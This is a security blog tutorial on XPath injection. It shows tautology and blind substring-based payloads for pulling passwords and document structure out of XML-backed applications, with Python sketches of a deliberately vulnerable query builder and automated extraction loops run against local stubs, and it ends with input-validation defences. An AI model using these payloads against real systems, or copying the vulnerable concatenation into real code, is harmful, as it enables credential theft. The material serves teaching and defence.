SpiderLabs Blog

Be Off the Beaten XPath, Go Blind

XPath (XML Path Language) is a language for querying XML documents to extract data. XML files are commonly used to store information on the server, particularly configuration settings. Some small applications keep their data in XML files to avoid deploying a full database environment. That data is usually not very sensitive, but things get more interesting when the application uses XML documents to store configuration data such as user settings. When user-supplied input is used to build an XPath query without being validated, it can be possible to inject XPath expressions in much the same way as you would exploit a SQL injection flaw.

XPath Basics

Let's look at a basic example of how XPath works and how an application can navigate an XML document to retrieve data. Consider an application that stores information about users in an XML file:

<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">

Using XPath you can retrieve any information from within the document (attributes, node text, comments, and so on). For instance, to retrieve the email address of every user you can use the following query:



To extract the BirthDay attribute value for every user:

//users/user/@BirthDay

Remember that XPath syntax is case sensitive. This means the attribute "BirthDay" is different from the attribute "birthday".
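
As a rough illustration of the points above, here is a minimal Python sketch using only the standard library. The sample document is a hypothetical reconstruction: the attributes come from the listing above, while the `<users>` wrapper, the `login` and `role` child elements, and the logins `ctravis` and `mborgui` are assumptions made for the example. Note also that `xml.etree.ElementTree` implements only a subset of XPath (it cannot select attributes directly), so the attribute is read from each selected element instead.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document. Child elements and most of their values are
# assumptions for illustration; only the attributes are taken from the article.
SAMPLE = """
<users>
  <user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
    <login>ctravis</login><role>user</role>
  </user>
  <user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
    <login>jrosewood</login><role>operator</role>
  </user>
  <user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">
    <login>mborgui</login><role>user</role>
  </user>
</users>
"""

root = ET.fromstring(SAMPLE)  # root is the <users> element

# Rough equivalent of //users/user/@BirthDay: select every <user>, then read
# the attribute, because ElementTree has no attribute axis.
birthdays = [user.get("BirthDay") for user in root.findall("./user")]

# Names are case sensitive: the predicate [@birthday] matches nothing.
with_exact_case = root.findall("./user[@BirthDay]")
with_wrong_case = root.findall("./user[@birthday]")

print(birthdays)
print(len(with_exact_case), len(with_wrong_case))
```

A full XPath 1.0 engine would accept the article's queries as written; the subset used here is only meant to make the navigation and the case sensitivity visible.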

To extract the BirthDay attribute value of users with the "user" role:

//users/user[role/text()='user']/@BirthDay

Injecting into XPath

Now that we understand how XPath works, let's see how an attacker could inject arbitrary expressions to retrieve information they should not be able to see. Consider a feature that returns the birth date for a given login and role. For example, if the user supplies login=jrosewood and role=operator, the application will build the following XPath query:

//users/user[login/text()='jrosewood' and role/text()='operator']/@BirthDay



If the application concatenates user-supplied data into the XPath query string without any validation, it is possible to manipulate the original query by sending an empty login together with the following role value:

role=' or 'a'='a

That will result in the following XPath query:

//users/user[login/text()='' and role/text()='' or 'a'='a']/@BirthDay



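In XPath, "and" binds more tightly than "or", so the predicate is evaluated as (login/text()='' and role/text()='') or 'a'='a'. The OR term is always true, and the query returns every BirthDay entry. That is not very useful at this point, but let's see how we can extract more data.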
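
To make the string manipulation concrete, the following Python sketch shows how naive concatenation produces both queries shown above. The function name `build_query` is hypothetical; the article does not show the application's code, so this is only an assumption about what a vulnerable implementation might look like.

```python
def build_query(login: str, role: str) -> str:
    """Deliberately vulnerable: user input is pasted straight into the XPath string."""
    return (
        "//users/user[login/text()='" + login
        + "' and role/text()='" + role
        + "']/@BirthDay"
    )

# Legitimate request: login=jrosewood, role=operator
normal = build_query("jrosewood", "operator")

# Malicious request: empty login, role=' or 'a'='a
injected = build_query("", "' or 'a'='a")

print(normal)
print(injected)
```

The quote at the start of the payload closes the string literal opened by the application, and the unterminated 'a at the end is closed by the application's own trailing quote, which is why the result is still a syntactically valid query.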

As in SQL, XPath has a substring() function that extracts a subset of characters from a string. For instance, the following value tests whether the first character of John Rosewood's password is 'A':

role=operator' and substring(password/text(),1,1)='A' and 'a'='a

The resulting XPath query is now:

//users/user[login/text()='jrosewood' and role/text()='operator' and substring(password/text(),1,1)='A' and 'a'='a']/@BirthDay

This should not return anything, because the substring() term of the AND sequence is false (the first character is not 'A'). If we test for the letter 's' instead, the query returns his birth date, which means the first character is 's'. Using this technique we can recover the full password one character at a time:

role=operator' and substring(password/text(),2,1)='3' and 'a'='a
role=operator' and substring(password/text(),3,1)='c' and 'a'='a
role=operator' and substring(password/text(),4,1)='r' and 'a'='a
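
The character-by-character loop can be sketched in Python as follows. This is a minimal sketch under stated assumptions: `oracle` stands for any function that sends a role value to the application and reports whether a birth date came back, and `make_stub_oracle` is a hypothetical stand-in that simulates that behaviour locally against a made-up password ("s3cr3t", chosen only because it starts with the characters tested above). No real XPath engine or network request is involved.

```python
import re
import string
from typing import Callable

# Candidate characters to try at each position (an assumption; extend as needed).
CHARSET = string.ascii_letters + string.digits

def char_payload(expr: str, pos: int, ch: str) -> str:
    """Build the role value that asks: is character `pos` of `expr` equal to `ch`?"""
    return f"operator' and substring({expr},{pos},1)='{ch}' and 'a'='a"

def extract_string(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the string value of `expr` one character at a time."""
    found = []
    for pos in range(1, max_len + 1):      # XPath positions start at 1
        for ch in CHARSET:
            if oracle(char_payload(expr, pos, ch)):
                found.append(ch)
                break
        else:
            break                          # no candidate matched: end of string
    return "".join(found)

def make_stub_oracle(secret: str) -> Callable[[str], bool]:
    """Hypothetical stand-in for the vulnerable endpoint, for local testing only."""
    pattern = re.compile(r"substring\(password/text\(\),(\d+),1\)='(.)'")
    def oracle(role_value: str) -> bool:
        match = pattern.search(role_value)
        pos, ch = int(match.group(1)), match.group(2)
        return secret[pos - 1:pos] == ch   # empty slice past the end never matches
    return oracle

stub = make_stub_oracle("s3cr3t")
recovered = extract_string(stub, "password/text()")
print(recovered)
```

Against a real target, the oracle would issue the HTTP request and return True only when the response contains a birth date. The loop stops at the first position where no candidate matches, which also happens if the real value contains a character missing from `CHARSET`.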

But this assumes you already know the structure of the XML document, right? That is not an issue: with XPath it is also possible to retrieve tag and attribute names.

Going blind

In a situation where nothing is known about the structure of the XML document, XPath can still be used to extract data. For instance, to retrieve the root tag name, the following query can be used:

name(//*)

The name() function returns the name of a node; when it is given a node-set, it uses the first node in document order. Since the root element always comes first, name(//*) yields the root tag name. We can now extract the full name the same way as before:

role=operator' and substring(name(//*),1,1)='u' and 'a'='a
role=operator' and substring(name(//*),2,1)='s' and 'a'='a
role=operator' and substring(name(//*),3,1)='e' and 'a'='a

To retrieve the name of an attribute, the following query could be used:

name(//users/user[position()=1]/@*[1])

This one needs a bit more explanation. It first navigates to the first <user> element under <users> and then selects its first attribute. The position() function returns the index of the current node (we want the first one). As you may have noticed, there is a handy way to select an attribute by its index: @*[index]. Here, @*[1] selects the first attribute, in whatever order the XPath implementation exposes attributes. Let's use this in our attack payload:

role=operator' and substring(name(//users/user[position()=1]/@*[1]),1,1)='I' and 'a'='a
role=operator' and substring(name(//users/user[position()=1]/@*[1]),2,1)='d' and 'a'='a

Other useful functions can also be used:

  • count(): returns the number of nodes (useful to automate the extraction and iterate over position() values without going too far). For example, to test the number of <user> elements:


    role=operator' and count(//users/user)=3 and 'a'='a

  • string-length(): returns the length of a string (useful to bound the character-by-character extraction with substring()). To test the length of the first attribute's name on the first <user> node:


    role=operator' and string-length(name(//users/user[position()=1]/@*[1]))=2 and 'a'='a
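
Because these payloads only confirm or deny a guessed number, a tool has to try candidate values until one matches. The Python sketch below shows one simple way to do that. As before, `oracle` is any function that reports whether the application returned a birth date for a given role value; `stub_oracle` and its `KNOWN_ANSWERS` table are hypothetical stand-ins that simulate the application using the figures from this article (three users, and a first attribute name, "Id", of length two).

```python
import re
from typing import Callable, Optional

def number_payload(expr: str, n: int) -> str:
    """Build the role value that asks: does `expr` evaluate to `n`?"""
    return f"operator' and {expr}={n} and 'a'='a"

def find_number(oracle: Callable[[str], bool], expr: str, limit: int = 64) -> Optional[int]:
    """Try 0..limit in turn and return the first value the oracle confirms."""
    for n in range(limit + 1):
        if oracle(number_payload(expr, n)):
            return n
    return None  # value is above `limit` or the expression is invalid

# Hypothetical stand-in for the vulnerable endpoint, for local testing only.
KNOWN_ANSWERS = {
    "count(//users/user)": 3,
    "string-length(name(//users/user[position()=1]/@*[1]))": 2,
}
PAYLOAD_RE = re.compile(r"^operator' and (.+)=(\d+) and 'a'='a$")

def stub_oracle(role_value: str) -> bool:
    match = PAYLOAD_RE.match(role_value)
    if match is None:
        return False
    expr, guess = match.group(1), int(match.group(2))
    return KNOWN_ANSWERS.get(expr) == guess

user_count = find_number(stub_oracle, "count(//users/user)")
name_length = find_number(
    stub_oracle, "string-length(name(//users/user[position()=1]/@*[1]))"
)
print(user_count, name_length)
```

Knowing the count and the length in advance lets an extraction tool stop exactly at the last node and the last character instead of probing until nothing matches.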


XPath is a standardized language, so the same attack string generally works against any implementation, whereas SQL injection payloads often have to be adapted to each database dialect. Also, unlike database objects, access cannot be restricted to parts of an XML document. Once the application is authorized to read an XML file, it can access any data within it.

To protect the application against XPath injection attacks, every user-supplied input must be validated before being used in an XPath query. Parameterized queries are not as widely available for XPath as they are for SQL: some APIs let you bind values to XPath variables (for example through Java's XPathVariableResolver), but many do not, so input validation remains essential. The best approach is "exact match" validation, where inputs are compared against a list of known good values (e.g. states or zip codes). If that is not possible, use "white list" validation that accepts only known good characters; in most cases only alphanumeric characters should be allowed. At a minimum, the following special characters must be rejected:

/ ( ) , = ' [ ] * : and all whitespace

Remember to always reject the request and send a message back to the user specifying the correct format. Never try to sanitize or substitute the unwanted characters.
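
A minimal Python sketch of both validation styles is shown below. The function names and the set of known roles are assumptions made for the example (the article only mentions the "user" and "operator" roles). The role is checked by exact match, the login by an alphanumeric-only white list, and invalid input is rejected outright rather than cleaned up.

```python
import re

# White list: one or more ASCII letters or digits, nothing else.
ALPHANUMERIC = re.compile(r"[A-Za-z0-9]+")

# Exact match list. Hypothetical: only the roles mentioned in the article.
KNOWN_ROLES = {"user", "operator"}

def validate_role(value: str) -> str:
    """Exact match validation: accept only values from a known good list."""
    if value not in KNOWN_ROLES:
        raise ValueError("role must be one of: " + ", ".join(sorted(KNOWN_ROLES)))
    return value

def validate_login(value: str) -> str:
    """White list validation: accept only letters and digits."""
    if not ALPHANUMERIC.fullmatch(value):
        raise ValueError("login must contain only letters and digits")
    return value

def is_rejected(check, value: str) -> bool:
    """Helper for the demo: True if the validator refuses the value."""
    try:
        check(value)
    except ValueError:
        return True
    return False

print(is_rejected(validate_role, "operator"))
print(is_rejected(validate_role, "' or 'a'='a"))
print(is_rejected(validate_login, "jrosewood"))
print(is_rejected(validate_login, "x' and substring(password/text(),1,1)='s"))
```

Using `fullmatch` ensures the whole value is checked, so a payload cannot pass by merely starting with valid characters. The error message tells the user which format is expected without echoing the rejected input back.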
